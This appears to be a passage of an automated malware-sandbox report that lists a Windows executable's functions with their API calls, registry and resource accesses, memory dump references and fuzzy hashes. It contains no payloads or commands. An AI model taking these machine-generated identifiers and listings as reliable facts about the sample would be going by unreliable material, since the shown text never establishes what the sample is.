                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 003E1918
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,?,?), ref: 003E192C
                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 003E1944
                                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003E1964
                                                                                                                                                                                                                                                            • EqualSid.ADVAPI32(00000004,?), ref: 003E197A
                                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?), ref: 003E199C
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003E19A3
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 003E19AD
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2168512254-0
                                                                                                                                                                                                                                                            • Opcode ID: ce8ea5167f17d8420f9cb2235e8029f9db3657131150507326f0952c8430a4c1
                                                                                                                                                                                                                                                            • Instruction ID: 564dfa0dce1f557878e0ade4ad8c0cb8109ea46e3dec301a519b885ddaa240b8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce8ea5167f17d8420f9cb2235e8029f9db3657131150507326f0952c8430a4c1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1314F71A00299AFDB229FA6DC88ABFBBBCFF04710F110629F545D6191D7309D05DB61
                                                                                                                                                                                                                                                            Function 003E681F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 81registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 003E686E
                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004A), ref: 003E68A7
                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003E68CC
                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,003E1140,00000000,?,?,0000000C), ref: 003E68F4
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 003E6902
                                                                                                                                                                                                                                                              • Part of subcall function 003E66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,003E691A), ref: 003E6741
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                                            • String ID: ;F>$Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                                            • API String ID: 3346862599-1716249293
                                                                                                                                                                                                                                                            • Opcode ID: 3c38aac4ad6e9535de66726bd2639f202c3ef3f4c3106ad3eb961f90f1f27f18
                                                                                                                                                                                                                                                            • Instruction ID: b2001789cda8929816d91a9b4e6d91a0b8f09d87a03439be0cb208423bd689d5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c38aac4ad6e9535de66726bd2639f202c3ef3f4c3106ad3eb961f90f1f27f18
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE315431A402A8DFDB32CB52CC46BAA777CEB95798F010395E94DAA1C1D730AD858F52
                                                                                                                                                                                                                                                            Function 003E17EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71librarymemoryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,003E18DD), ref: 003E181A
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 003E182C
                                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(003E18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,003E18DD), ref: 003E1855
                                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?,?,?,?,003E18DD), ref: 003E1883
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,003E18DD), ref: 003E188A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                                            • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                                            • Opcode ID: e2693d9d0158dd9eebf2895c084e6fa7a9f593a9ddfc0426f47e499fb6c7dd29
                                                                                                                                                                                                                                                            • Instruction ID: e253aef19a74c9750e99c0769f4d2be5487a356d332931a1169288dc3cf2e80a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2693d9d0158dd9eebf2895c084e6fa7a9f593a9ddfc0426f47e499fb6c7dd29
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55119331E00259ABDB129FA5DC89ABEBB7CEF44711F110669FA06E62D0DA709D04CB91
                                                                                                                                                                                                                                                            Function 003E3450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 003E3490
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 003E349A
                                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,valid), ref: 003E34B2
                                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000838), ref: 003E34C4
                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 003E34CB
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000002), ref: 003E34D8
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                                            • String ID: valid
                                                                                                                                                                                                                                                            • API String ID: 852535152-2349282815
                                                                                                                                                                                                                                                            • Opcode ID: eeb447054edc7f9e653a296a74e98eb0dd9760d482ae5e74c839f8eb2f4deecf
                                                                                                                                                                                                                                                            • Instruction ID: 7dc367e4abb59ce42d08796c54b7048e14236bc8ffd4197601ba2196c18c0d9c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eeb447054edc7f9e653a296a74e98eb0dd9760d482ae5e74c839f8eb2f4deecf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58019E312405F4ABC7275F67DC4C9AD3A68EB49701F028615F9469BAE0CA30AF41CF82
                                                                                                                                                                                                                                                            Function 003E2AAC Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 003E2AE6
                                                                                                                                                                                                                                                            • IsDBCSLeadByte.KERNEL32(00000000), ref: 003E2AF2
                                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 003E2B12
                                                                                                                                                                                                                                                            • CharUpperA.USER32 ref: 003E2B1E
                                                                                                                                                                                                                                                            • CharPrevA.USER32(?,?), ref: 003E2B55
                                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 003E2BD4
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 571164536-0
                                                                                                                                                                                                                                                            • Opcode ID: 941f9629a7d8c0a67e650aaf853f1764f0b4d9bb75dec806e0724a0019a8aafd
                                                                                                                                                                                                                                                            • Instruction ID: 7b5237d4b7c733a716d73f8fe06cb110af466c63e5976529f452e4d4979f41bd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 941f9629a7d8c0a67e650aaf853f1764f0b4d9bb75dec806e0724a0019a8aafd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD4137345082E69EDF279F308C44AFE7B6D9F56300F05429AE8C28B2C2DB745E86CB50
                                                                                                                                                                                                                                                            Function 003E28E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 003E2A6F
                                                                                                                                                                                                                                                              • Part of subcall function 003E2773: CharUpperA.USER32(3B97056F,00000000,00000000,00000000), ref: 003E27A8
                                                                                                                                                                                                                                                              • Part of subcall function 003E2773: CharNextA.USER32(0000054D), ref: 003E27B5
                                                                                                                                                                                                                                                              • Part of subcall function 003E2773: CharNextA.USER32(00000000), ref: 003E27BC
                                                                                                                                                                                                                                                              • Part of subcall function 003E2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E2829
                                                                                                                                                                                                                                                              • Part of subcall function 003E2773: RegQueryValueExA.ADVAPI32(?,003E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E2852
                                                                                                                                                                                                                                                              • Part of subcall function 003E2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E2870
                                                                                                                                                                                                                                                              • Part of subcall function 003E2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E28A0
                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,003E3938,?,?,?,?,-00000005), ref: 003E2958
                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 003E2969
                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 003E2A21
                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 003E2A81
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                                            • String ID: 89>
                                                                                                                                                                                                                                                            • API String ID: 3949799724-450690347
                                                                                                                                                                                                                                                            • Opcode ID: 3edc8f79b29d975ccb52e200ba7b3be425f81bc8b1f5a5ba344e405f9170ae5a
                                                                                                                                                                                                                                                            • Instruction ID: 2e23d057014228d1a5f60314e5a6d2b8ce67147ceaec9509420e279ea1829762
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3edc8f79b29d975ccb52e200ba7b3be425f81bc8b1f5a5ba344e405f9170ae5a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2514E31D00269DFCB26DF99C884AAEFBB9FF48700F15422AE901E7291DB319D41DB90
                                                                                                                                                                                                                                                            Function 003E43D0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 003E43F1
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 003E440B
                                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 003E4423
                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 003E442E
                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 003E443A
                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 003E4447
                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 003E44A2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2212493051-0
                                                                                                                                                                                                                                                            • Opcode ID: a1a4475224fbe5bb6065c56c76700dcc19176032b71ced2839f0b052355bf18e
                                                                                                                                                                                                                                                            • Instruction ID: 20c56016b3e6fa49a1425c0a572bfb52614d09ef14f317cb4db901b32f0ea557
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1a4475224fbe5bb6065c56c76700dcc19176032b71ced2839f0b052355bf18e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6315071F00559AFCB15CFB9DD899EEBBB9EB89310F154269F805F7280DA30AD058B60
                                                                                                                                                                                                                                                            Function 003E6298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 003E171E: _vsnprintf.MSVCRT ref: 003E1750
                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,003E51CA,00000004,00000024,003E2F71,?,00000002,00000000), ref: 003E62CD
                                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,003E51CA,00000004,00000024,003E2F71,?,00000002,00000000), ref: 003E62D4
                                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003E51CA,00000004,00000024,003E2F71,?,00000002,00000000), ref: 003E631B
                                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 003E6345
                                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003E51CA,00000004,00000024,003E2F71,?,00000002,00000000), ref: 003E6357
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                                            • String ID: UPDFILE%lu
                                                                                                                                                                                                                                                            • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                                            • Opcode ID: 78cdd72d295b180677fff801ecf26473311e442353ea2c10f8eadf38f20040d0
                                                                                                                                                                                                                                                            • Instruction ID: df52757633c280b0df0c3b9b208c4049b07d8c71e1fb2e04ba42c04aad1cc8ee
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78cdd72d295b180677fff801ecf26473311e442353ea2c10f8eadf38f20040d0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D21F879A00269ABDB229F658C869FE7B7CEB44750F110319F902A72D1DB359D018BE1
                                                                                                                                                                                                                                                            Function 003E24E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 003E2506
                                                                                                                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 003E252C
                                                                                                                                                                                                                                                            • _lopen.KERNEL32(?,00000040), ref: 003E253B
                                                                                                                                                                                                                                                            • _llseek.KERNEL32(00000000,00000000,00000002), ref: 003E254C
                                                                                                                                                                                                                                                            • _lclose.KERNEL32(00000000), ref: 003E2555
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                                            • String ID: wininit.ini
                                                                                                                                                                                                                                                            • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                                            • Opcode ID: 15f701aa2068b3f558a1838ba810fba21de06c4a8811cf5848c8fda674ed63f1
                                                                                                                                                                                                                                                            • Instruction ID: 0dfc77cc2df6ec26bb166dec365458010e4ef1bca134b38bf9a8c35283ae67b1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15f701aa2068b3f558a1838ba810fba21de06c4a8811cf5848c8fda674ed63f1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4501F5326001686BC7319B669C4DEDFBB7CDB82760F010364FA49D71D0DE749E41CA91
                                                                                                                                                                                                                                                            Function 003E36EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 003E3723
                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 003E39C3
                                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000000,valid,00000030), ref: 003E39F1
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$BeepVersion
                                                                                                                                                                                                                                                            • String ID: 3$valid
                                                                                                                                                                                                                                                            • API String ID: 2519184315-3539985779
                                                                                                                                                                                                                                                            • Opcode ID: 5eb9725bbd2c08a2619998c1e1ada725f1ee34baed64c30fbc8daf66692ee6b2
                                                                                                                                                                                                                                                            • Instruction ID: 2505d2fd4f24c56bc8d58510cd8da895d4e5f36cbcd4faf2a8a1b72580d222b2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5eb9725bbd2c08a2619998c1e1ada725f1ee34baed64c30fbc8daf66692ee6b2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3391D271E012B49BDB778B16CD897EA77A5AF45304F1603A9E8499B2C1D7718F80CB41
                                                                                                                                                                                                                                                            Function 003E6517 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(003E0000,000007D6,00000005), ref: 003E652A
                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(003E0000,00000000,?,?,003E2EE8,00000000,003E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 003E6538
                                                                                                                                                                                                                                                            • DialogBoxIndirectParamA.USER32(003E0000,00000000,00000547,003E19E0,00000000), ref: 003E6557
                                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,003E2EE8,00000000,003E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 003E6560
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                                            • String ID: .>
                                                                                                                                                                                                                                                            • API String ID: 1214682469-777486363
                                                                                                                                                                                                                                                            • Opcode ID: abda1c06ee340a322fb1b3a8232d3d4bff50f37e25548df1e956f0b0bbefb633
                                                                                                                                                                                                                                                            • Instruction ID: 2ca6b626c3f55bf767d46ef265839ff3c07415e5f6d71844c3d36ef52c06dcfa
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: abda1c06ee340a322fb1b3a8232d3d4bff50f37e25548df1e956f0b0bbefb633
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B012B722005A9BBCB225F5A9C49DBB766CEB9A3A1F010325FE01971D0D771DD108AA1
                                                                                                                                                                                                                                                            Function 003E6495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41libraryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
